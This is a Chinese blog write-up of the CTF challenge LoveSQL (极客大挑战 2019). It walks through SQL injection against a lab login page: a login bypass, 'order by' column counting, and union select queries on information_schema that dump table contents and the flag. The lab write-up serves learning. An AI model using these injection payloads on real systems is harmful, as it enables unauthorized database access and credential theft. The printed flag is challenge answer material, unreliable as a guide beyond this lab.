【CTF_SQL】[极客大挑战 2019]LoveSQL 1

最新推荐文章于 2024-06-24 14:37:30 发布
最新推荐文章于 2024-06-24 14:37:30 发布
阅读量2.1k 收藏 15
点赞数 3
分类专栏: 学习笔记 文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52372189/article/details/127457327
版权

[极客大挑战 2019]LoveSQL 1

先启动靶机

靶机启动

点进行去后是如下的

靶机进入

思路

sql问题—去想SQL注入问题

进入环境,我们就尝试去最经典的万能密码
1' or '1' = '1

1.最经典的sql注入
  • 1
  • 1'
  • 1' or '1' = '1
    用上面的进行测试,
1.11

1的测试
用户名密码错误

提示:是错误的

1.21'

用户名或者用户名与密码都输入1'
1'测试
在这里插入图片描述

提示语法错误,并说明了使用的数据库是(MariaDB)数据库~~~
所以,sql注入是可以的~~~

一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;
SQL注入——MariaDB

通过我们在网上的查询或者对该数据库的了解,我们得知:

用户名输入sql注入基本公式:1’ or 1=1#

测试1' or 1=1#

login successfully

尝试一:是否是flag

结果为否。
错误flag

尝试二:编码转换(编码解码操作)

这里,我们就需要对常用的一些编码格式有一定的了解。Eg:url编码格式:(必定含有%百分号)https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=15007414_9_dg&wd=mariadb%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E6%9C%AC%E5%85%AC%E5%BC%8F&oq=mariadb%25E7%259A%2584SQL%25E6%25B3%25A8%25E5%2585%25A5%25E5%259F%25BA%25E6%259C%25AC%25E5%2585%25B1%25E8%25AF%2586&rsv_pq=97ac7ad600009fe4&rsv_t=7b29v%2BEXTrQsnbUQfPhLd9IRuAl5Os3lNZ1x6cRtY7kVUfVyCyVhbZjAdNHMK11tm0p4EQ&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_btype=t&inputT=1817&rsv_sug3=43&rsv_sug1=43&rsv_sug7=100&rsv_sug2=0&rsv_sug4=167954

解码后
url解码表

本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。
所以,我们就需要跟着大佬的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到
别管我

咳咳,我们回到正题。再来回想一下,我们刚才出现的编码是什么?
02c039daff423020bb2e39a03514c659
first我发现,我第一次登录和第二次登录是不一样的结果,就推测他应该不是直接或者间接的编码了。
不信,咱们最好还是测试一下吧,有点像MD5编码,参加过全国大学生数学建模大赛的或者知道MD5吧~
发现不行;
MD5

可能是在其他的表中
  • 测试字段admin' order by 4#
# 回显
Unknown column '4' in 'order clause'
-- 说明有四个字段,猜测为:`id、username、password`
  • 1' union select 1,2,3#
Login Success!




Hello 2!

Your password is '3'
  • l了解php的话,我们也可以使用url
  • 在这里插入图片描述
  • 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 
Login Success!


Hello 2!

Your password is 'geekuser,l0ve1ysq1'

可以看到有geekuser,l0ve1ysq1两个表

  • 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#–geekuser表
  • 我们看到了字段;
  • Hello 2! Your password is 'id,username,password'
  • 另一张表
    - 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
    在这里插入图片描述

查表

1' union select 1,2,group_concat(id,username,password) from geekuser#


Your password is '1admin02c039daff423020bb2e39a03514c659'

Hello 2!

l0ve1ysq1

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{beec6b36-6755-4a05-b52f-0cb9990a1c93}'

发现了flagflag{beec6b36-6755-4a05-b52f-0cb9990a1c93}
在这里插入图片描述

拾贰_C
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 187
这一题和easysql页面一样
[极客挑战 2019]EasySQL 1
qq_44122254的博客
11-30 171
进入靶场,发现是一个用户登录的界面输入admin登录一下发现也没有什么东西 进行简单的sql注入进行测试一下 发现是存在sql注入的 进行简单的sql注入 ; ‘and’1’=‘1 在用 ‘or’1’=’%23得出flag ...
Buuctf:[极客挑战 2019]LoveSQL1
羽的博客
07-09 254
随便输入 1 1 果然。 1' 1
[极客挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4789
[极客挑战 2019]LoveSQL 1(SQL注入)
[极客挑战 2019]LoveSQL 1
qq_43618536的博客
07-01 714
BUUCTF的[极客挑战 2019]LoveSQL 1
[极客挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 694
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
Buuctf [极客挑战 2019]LoveSQL 1
m0_64444909的博客
07-21 672
代码】BuuCTF[极客挑战2019]LoveSQL1。
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
i-SOON_CTF_2019 2019第二届安洵杯部分过渡环境/源码 收集分类为大型/大型CTF比赛赛题,提供容器化专属翻译环境。 如有争议,或转型问题请电联
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
BUUCTF [极客挑战 2019]LoveSQL 1
CrotZZ的博客
07-07 1532
#和- - 表示注释,url中的#号是用来指导浏览器动作的,对服务器端无用。所以http请求中不包括#,因此使用#无法表示注入,- -(空格)在传输过程中空格会被忽略,导致无法注释 可以使用–+的方式+会被解释成空格,也可以–%20或者#可以写成%23 首先是用万能密码尝试 有成功的返回,试着看看有多少字段 ?username=1’ order by 4%23&password=123有错误返回 获取回显点位 ?username=1’ union select 1,2,3%23&passw
[极客挑战 2019]LoveSQL1
underline0的博客
12-23 1103
前言,个人认为这是一道比较好的题目,很好的考察了我们sql注入的基本功,以及对基本题型的分析能力。 1.打开链接,我们看到这个,尝试使用语句1' or 1#看看是否可以登录 2.确实可以登录。 我们尝试用这个用户名和密码登录,发现同样显示这个页面,发现密码有点异常,32位数字字母组合加密,应该是md5,但是不可逆解密,所以我们需要另换方法。 3.这个页面其实有点像sqli-labs上前面题目的模型,尝试找注入点,在前面用户名和后面密码上看看能不能动手脚 我在末尾加入了单引号,发现报错,再.
[极客挑战 2019]LoveSQL1(详解)
2301_77451464的博客
01-31 978
可以看到有geekuser,l0ve1ysq1两个表。1’ order by 3'(正常回显)查看另一张表,有相同的结果。测试出来正确的用户名为。经过二分法测试有3列。
[极客挑战 2019]LoveSQL1 题目分析与详解
2302_79800344的博客
02-27 830
一、题目简介。
Oracle数据库之PL/SQL例外(二十三)
最新发布
pursue_mony的博客
06-24 320
系统定义例外是Oracle数据库预先定义好的异常,用于处理常见的错误情况。这些异常通常与SQL操作或PL/SQL代码执行过程中的特定错误相关。:当SELECT INTO语句没有返回任何行时触发。:当SELECT INTO语句返回多行时触发,而该语句期望只返回一行。:当尝试除以零时触发。:当发生算数或转换错误时触发,例如,尝试将字符串转换为数字时失败。:在等待资源时发生超时。除了系统定义例外外,用户还可以根据需要定义自己的例外。自定义例外允许用户为特定的业务逻辑或错误情况定义异常处理机制。
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

拾贰_C

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值